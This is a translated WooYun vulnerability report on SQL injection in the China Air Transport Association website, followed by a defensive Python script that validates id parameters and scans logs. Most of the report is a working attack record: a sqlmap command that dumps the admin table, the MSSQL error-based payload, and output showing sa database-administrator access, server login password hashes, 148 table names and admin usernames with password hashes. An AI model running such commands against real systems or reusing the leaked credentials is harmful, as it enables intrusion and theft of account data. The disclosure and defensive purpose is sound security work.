WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2015-10-24: Details reported to the vendor, awaiting vendor handling
2015-10-28: Vendor confirmed; details disclosed to the vendor only
2015-11-07: Details disclosed to core white hats and relevant domain experts
2015-11-17: Details disclosed to regular white hats
2015-11-27: Details disclosed to intern white hats
2015-12-12: Details disclosed to the public
China Air Transport Association: SQL injection at one location (DBA privileges / sa password leaked / 148 tables / admin passwords leaked)
Test URL: http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw
python sqlmap.py -u "http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw" --random-agent -p contentid --technique=E -D webplug_thxh -T AdminUser -C AdminUserID,LoginName,Password,Email --dump
---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current user is DBA: True
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100b3d80630dbee3a8a58a74641cd043eeda38aaa96b010f27b
        header: 0x0100
        salt: b3d80630
        mixedcase: dbee3a8a58a74641cd043eeda38aaa96b010f27b
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01007de408d88ab4c5e16cfd45bf2b5baab81df972382092ad9f
        header: 0x0100
        salt: 7de408d8
        mixedcase: 8ab4c5e16cfd45bf2b5baab81df972382092ad9f
[*] sa [1]:
    password hash: 0x0100f65f10d1ed15a6fb82a41330e9446e9bb1da47eb42852edd
        header: 0x0100
        salt: f65f10d1
        mixedcase: ed15a6fb82a41330e9446e9bb1da47eb42852edd
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] webplug_thxh
[*] webplug_tyhk
Database: webplug_thxh
[148 tables]
AdminRole, AdminRoleMenu, AdminRoleNode, AdminUser, AdminUserRole, Component, ComponentAccessory, ComponentCategory, Email, Invitation, Job_001_Department, Node, NodeAccessory, NodeComponent, NodeGroup, NodeGroupRelation, NodeThumbnailPhoto, PositionCollection, PressRelease, Product, Recruitment, Replies, RepliesTB, Site, SiteLanguage, SupplyDemandRelease, SystemLogging, SystemMenu, TalentJob, Templet, ThumbnailPhoto,
ad_001_Advertisement, ad_001_AdvertisementCouplet, ad_001_AdvertisementFloat, ad_001_AdvertisementPopWin, ad_001_AdvertisementTemplates,
catalog_001_Category, catalog_001_Item, catalog_001_PhotoDetail, catalog_001_Review, city,
dnt_admingroups, dnt_adminvisitlog, dnt_advertisements, dnt_announcements, dnt_attachments, dnt_attachpaymentlog, dnt_attachtypes, dnt_banned, dnt_bbcodes, dnt_bonuslog, dnt_creditslog, dnt_debatediggs, dnt_debates, dnt_failedlogins, dnt_favorites, dnt_forumfields, dnt_forumlinks, dnt_forums, dnt_help, dnt_invitation, dnt_locations, dnt_medals, dnt_medalslog, dnt_moderatormanagelog, dnt_moderators, dnt_myattachments, dnt_myposts, dnt_mytopics, dnt_navs, dnt_notices, dnt_online, dnt_onlinelist, dnt_onlinetime, dnt_orders, dnt_paymentlog, dnt_pms, dnt_polloptions, dnt_polls, dnt_postdebatefields, dnt_postid, dnt_posts1, dnt_ratelog, dnt_scheduledevents, dnt_searchcaches, dnt_smilies, dnt_statistics, dnt_stats, dnt_statvars, dnt_tablelist, dnt_tags, dnt_templates, dnt_topicidentify, dnt_topics, dnt_topictagcaches, dnt_topictags, dnt_topictypes, dnt_trendstat, dnt_userfields, dnt_usergroups, dnt_users, dnt_words,
form_001_Config, form_001_Form, imageviewer_001_Category, imageviewer_001_Group, imageviewer_001_Item,
job_001_Job, job_003_Department, job_003_Job, job_003_uip_Certificate, job_003_uip_EducationHistory, job_003_uip_Province, job_003_uip_ResumeState, job_003_uip_TrainingHistory, job_003_uip_User, job_003_uip_WorkHistory, job_003_uip_v_Resume, job_004_Department, job_004_Job, job_004_State, job_004_User,
member_001_Member, member_001_MemberDisplay, member_001_MemberType, message_001_Display, message_001_Message, message_001_Type,
publication_001_Article, publication_001_Catalog, publication_001_Periodical, publication_001_Publication, research_001_Answer, research_001_Item, research_001_Paper, research_001_Question,
thxh_Apply, thxh_Baike, thxh_BaikeAnswer, thxh_BaikeType, thxh_Collection, thxh_Comment, thxh_EnterpriseInfo, thxh_HrInfo, thxh_Message, thxh_TradeLeads, thxh_UserInfo, wp_Config
Database: webplug_thxh
Table: AdminUser
[6 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AddTime     | datetime |
| AdminUserID | int      |
| Email       | nvarchar |
| LoginName   | nvarchar |
| Password    | nvarchar |
| RealName    | nvarchar |
+-------------+----------+
Database: webplug_thxh
Table: AdminUser
[6 entries]
+-------------+-----------+----------------------------------+----------------------------+
| AdminUserID | LoginName | Password                         | Email                      |
+-------------+-----------+----------------------------------+----------------------------+
| 5           | yangy     | 1184328ec3cae297298fc2efb934c413 | <blank>                    |
| 6           | zkqing    | 317fe8866967ca216297b11f16810acd | <blank>                    |
| 3           | train     | 4793a9bda9ce17f55ba9892102e5c079 | tongyonghk_scg@**.**.**.** |
| 7           | xhgz      | a999652c5f65fda6700383af516fed78 | <blank>                    |
| 1           | admin     | f588d7eb08c290ebd300a3cdf0c5bad2 | <blank>                    |
| 4           | hzxx      | fb975e36766dc259d2cd68851c02e216 | tongyonghk_lry@**.**.**.** |
+-------------+-----------+----------------------------------+----------------------------+
Add input filtering.
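As an added illustration (not part of the original report, and not the site's own code), the following Python script shows the defender's side of this finding: strict integer validation for id parameters such as contentid, which on its own would have rejected the injected value, and a scan over constructed IIS-style log lines for the MSSQL error-based CONVERT(INT, ...) pattern that sqlmap used here. The log lines, the list of integer parameters and the function names are assumptions made for the example; the durable fix in the ASP.NET code itself is a parameterized query, with validation and log detection as defense in depth.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (sample data, not taken from the report):
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2015-10-24 10:01:02 GET /wenknr/index.aspx nodeid=331&page=ContentPage&contentid=12315&type=xw 200
2015-10-24 10:01:05 GET /wenknr/index.aspx nodeid=331&page=ContentPage&contentid=12315%20AND%203617=CONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(112)))&type=xw 500
2015-10-24 10:01:09 GET /wenknr/index.aspx nodeid=331&page=ContentPage&contentid=abc&type=xw 200
"""

# MSSQL error-based extraction: CONVERT(INT, <subselect or CHAR() string>) forces a
# conversion error whose message carries the selected data back to the client.
ERROR_BASED_RE = re.compile(
    r"CONVERT\s*\(\s*INT\s*,.*?(SELECT\b|CHAR\s*\()", re.IGNORECASE | re.DOTALL)

# Assumption: these parameters are integer ids in the application's URL scheme.
INT_PARAMS = ("nodeid", "contentid")


def parse_int_param(raw: str):
    """Strict integer parsing: the only value shape an id parameter should ever have."""
    return int(raw) if raw.isascii() and raw.isdigit() else None


def classify_query(query: str) -> list:
    """Findings for one raw cs-uri-query value (parse_qs does the percent-decoding)."""
    findings = []
    for name, values in parse_qs(query).items():
        for value in values:
            if name in INT_PARAMS and parse_int_param(value) is None:
                findings.append(f"non-integer:{name}")
            if ERROR_BASED_RE.search(value):
                findings.append(f"mssql-error-based:{name}")
    return findings


def scan_iis_log(text: str) -> list:
    """One record per log line that carries at least one finding."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6:
            continue
        findings = classify_query(fields[4])
        if findings:
            hits.append({"line": lineno, "status": fields[5], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```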
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-10-28 14:44
CNVD confirmed the reported situation and has forwarded it through CNCERT to the civil aviation industry evaluation center, which will coordinate remediation with the website's operating unit.
None at present.